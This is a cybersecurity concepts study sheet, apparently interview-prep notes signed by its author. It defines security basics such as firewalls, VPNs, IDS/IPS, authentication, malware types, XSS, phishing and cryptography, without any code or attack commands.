Cyber security concepts

What is Cybersecurity (Define)?

Cybersecurity is the protection of internet-connected systems, including hardware, software
and data from cyberattacks to prevent unauthorized access to data.

What is the goal of cybersecurity?

The goal of cybersecurity is to limit risk and protect IT assets from attackers with malicious
intent. maintain the confidentiality, integrity and availability (CIA) of data

What is the difference between Threat, Vulnerability, and Risk?

o Threat: Someone with the potential to cause harm by damaging or destroying the
official data to a system or organization.
o Vulnerability: It refers to weaknesses in a system that makes threat outcomes
more possible and even more dangerous.
o Risk: It refers to a combination of threat probability and impact/loss. In simple
terms, it is related to potential damage or loss when threat exploits the
vulnerability.

What is the firewall?

firewall is a network security system that monitors, and controls incoming and outgoing
network traffic based on predetermined security rules. A firewall typically establishes a
barrier between a trusted internal network and untrusted external network, such as the
Internet.

Firewall Types
▪ Packet Filtering: Check each packet against rules for IP and port
▪ Stateful Inspection: Maintains information about the state of each connection (basic
firewalls sold today)
▪ Next-Generation (NGFWs): Uses contextual information about users, apps, and
processes to make decisions
▪ Web Application (WAFs): filters, monitors, and blocks HTTP traffic to and from a web
application. A WAF is able to filter the content of specific web applications Protects
against web application attacks like SQL injection and Cross-site Scripting (SQL/XSS)
What is VPN?
A VPN secures the private network, using encryption and other security mechanisms to
ensure that only authorized users can access the network and that the data cannot be
intercepted. This type of network is designed to provides a secure, encrypted tunnel in
which to transmit the data between the remote user and the company network.
Cyber security concepts

IPSEC:
Internet Protocol Security (IPsec) is a secure network protocol suite that authenticates and
encrypts the packets of data to provide secure encrypted communication between two
computers over an Internet Protocol network. It is used in virtual private networks (VPNs).
IPsec involves two security services:

▪ Authentication Header (AH): This authenticates the sender and it discovers any
changes in data during transmission.
▪ Encapsulating Security Payload (ESP): This not only performs authentication for the
sender but also encrypts the data being sent

What is the difference between IDS and IPS?

IDS: monitoring system that only detects intrusions but unable to prevent intrusions
IPS: control system that detects and prevents intrusions, It needs a regularly updated
database with the latest threat data

Security Information and Event Management (SIEM)

SIEM products provide real-time analysis of security alerts that are flagged by network
appliances and software applications (aggregation).

What is Network Access Control (NAC)?

NAC is a computer networking solution that uses a set of protocols to define and implement
a policy that describes how to secure access to network nodes by devices when they initially
attempt to access the network

NAC is an approach to computer security that attempts to unify endpoint security

technology (such as antivirus, host intrusion prevention, and vulnerability assessment), user
or system authentication and network security enforcement
Cyber security concepts

What is the Patch Management?

The goal of patch management is to keep updating various systems in a network and protect
them against malware and hacking attacks.
Steps:
1. Read the description of the patch in question
2. Deploy the patch on a test system that is identical to the systems to which you
intend to roll it out
3. roll it out to a small number of live systems

what is Sandboxing?
Behaviour based software management strategy that isolates applications from critical
system resources and other programs It provides an extra layer of security that prevents
malware or harmful applications from negatively affecting your system

Define baseline?
Network baselining is the act of measuring and rating the performance of a network in real-
time situations.
Providing a network baseline requires testing and reporting of the physical connectivity,
normal network utilization, protocol usage, peak network utilization, and average
throughput of the network usage

what is the difference between the Red team and Blue team?

The red team refers to an attacker who exploits weaknesses in an organization's security.
The blue team refers to a defender who identifies and patches vulnerabilities into successful
breaches

What is Authentication and how to implement?

Authentication: Provides the method of identifying users
▪ Something you know: such as password.
▪ Something you have: such as smartcard, token.
▪ Something you are: such as your fingerprints.
▪ Something you do: such as an action you must take to complete authentication.
▪ Somewhere you are based on geolocation
Cyber security concepts

what is Challenge Handshake Authentication Protocol (CHAP)?

CHAP is an authentication scheme used by Point-to-Point Protocol (PPP) servers to validate
the identity of remote clients. CHAP periodically verifies the identity of the client by using a
three-way handshake

Kerberos?
Kerberos is a computer-network authentication protocol that works on the basis of tickets
to allow nodes communicating over a non-secure network to prove their identity to one
another in a secure manner

Kerberos authentication uses a key distribution centre (KDC) to orchestrate the process

Risk Management?
The process of identifying risks, analyzing them, developing a response strategy for them,
and mitigating their future impact.

What is a cybersecurity risk assessment?

A cybersecurity risk assessment refers to detecting the information assets that are prone to
cyber-attacks (including customer data, hardware, laptop, etc.) and evaluates various risks
that could affect those assets.

The best way to perform cybersecurity risk assessment is to detect:

Relevant threats in your organization
Internal and external vulnerabilities
Evaluate vulnerabilities impact if they are exploited

Incident Response Procedures

Preparation
Identification
Containment
Eradication
Recovery
Lessons learned
Cyber security concepts

What is Disaster recovery?

Disaster recovery T Disaster recovery the act of recovering data following a disaster in which
it has been destroyed he act of recovering data following a disaster in which it has been
destroyed
Disaster-recovery plan, or scheme, helps an organization respond effectively when a
disaster occurs

Types of malware?
Ransomware, Viruses, Worms, Trojans, Bots, Keylogger, Spyware, rootkit, spam, and
Adware

DOS and DDOS attacks?

Denial-of-service DOS: make a machine or network resource unavailable to its intended
users by temporarily or indefinitely disrupting services
Distributed denial-of-service DDOS: the incoming traffic flooding the victim originates from
many different sources

What is Man-in-the-middle attack (MITM)?

MITM is an attack where the attacker secretly relays and possibly alters the communication
between two parties who believe they are directly communicating with each other
ex: DHCP attack, ARP poisoning.

Define the Zero-day attack.

Zero-day attack is the threat of an unknown security vulnerability in a computer software or
application for which either the patch has not been released or the application developers
were unaware.

What is the use of Traceroute?

A Traceroute is a network diagnostic tool, used for tracking the pathway of an IP network
from source to destination. It records the period of each hop the packet makes while its
route to its destination
Cyber security concepts

What is a Botnet?

A Botnet is a group of internet-connected devices such as servers, PCs, mobile devices, etc.,
that are affected and controlled by malware. (using in DDOS attack)

What is Cross-Site Scripting and how it can be prevented?

Cross-Site Scripting is also known as a client-side injection attack, which aims at executing
malicious scripts on a victim’s web browser by injecting malicious code.

What is the difference between stored and reflected XSS?

o Stored XSS Attacks - The attacks where the injected scripts are stored on the target
servers permanently. In this, the victim retrieves the malicious script from the
server when requests the stored information.
o Reflected XSS Attacks - In this, the user has to send the request first, then it will
start running on the victim’s browser and reflects results from the browser to the
user who sent the request.

What is an active reconnaissance?

Active reconnaissance is a kind of computer attack where intruder engages the target
system for collecting the data about vulnerabilities.

The attackers mostly use port scanning to identify vulnerable ports and then exploit the
vulnerabilities of services that are associated with open ports

What is the difference between vulnerability assessment and penetration testing?

Vulnerability Assessment: It’s a process to define, detect, and prioritize the vulnerabilities in
computer systems, network infrastructure, applications…. etc, and gives the organization
with the required information to fix the flaws.
Penetration Testing: It is also called as pen testing or ethical hacking. It’s a process of testing
a network, system, application…... etc.
Cyber security concepts

What is phishing and how it can be prevented?

Phishing is a malicious attempt of pretending oneself as an authorized entity in electronic
communication for obtaining sensitive information such as usernames, passwords, etc.
through fraudulent messages and emails.

What is security misconfiguration?

Security misconfiguration is a vulnerability that could happen if an

application/network/device is susceptible to attack due to an insecure configuration option.
It can be as simple as keeping the default username/password unchanged.

Cryptography
Cryptography is a method of protecting information and communications through the use of
codes so that only those for whom the information is intended can read and process it.

What is a CIA triad?

The CIA Triad is a well-known, venerable model for the development of security policies
used in identifying problem areas, along with necessary solutions in the arena of
information security.

Confidentiality: ensuring that only authorized parties can read a message

Integrity: ensuring that any changes to data will be detected and rejected
Authentication: the sender and receiver can confirm each other's identity and the
origin/destination of the information

Encryption can provide Confidentiality at different network layer:

• Application layer (email)

• Session layer (SSL/TLS)
• Network layer (IPsec)
• Data link layer (MAC sec)
Cyber security concepts

Types of cryptography:
symmetric-key or Single-key encryption algorithms: Use the same key to encrypt and
decrypt data.
EX: AES, 3DES, DES
Asymmetric-key encryption algorithms: Use the different key (public & private) to encrypt
and decrypt data. EX: RSA, ALGamal

Secure Sockets Layer (SSL)

SSL (Secure Sockets Layer) is a secure protocol which provides safer conversations between
two or more parties across the internet. It works on top of the HTTP to provide security.

Hashing: A mechanism that is used for Data integrity assurance , based on one way Function
,EX : MD5 ,SHA-1 , SHA-2

What is the difference between hashing and salting?

• Hashing is majorly used for authentication and is a one-way function where data is
planned to a fixed-length value.
• Salting is an extra step for hashing, where it adds additional value to passwords
that change the hash value created.

public key infrastructure (PKI)

A public key infrastructure (PKI) is a set of roles, policies, hardware, software and
procedures needed to create, manage, distribute, use, store and revoke digital certificates
and manage public-key encryption

Eng. Safwan Rastanawi

Safwan.rastanawi@gmail.com
+966596693321
@safwan.rastanawi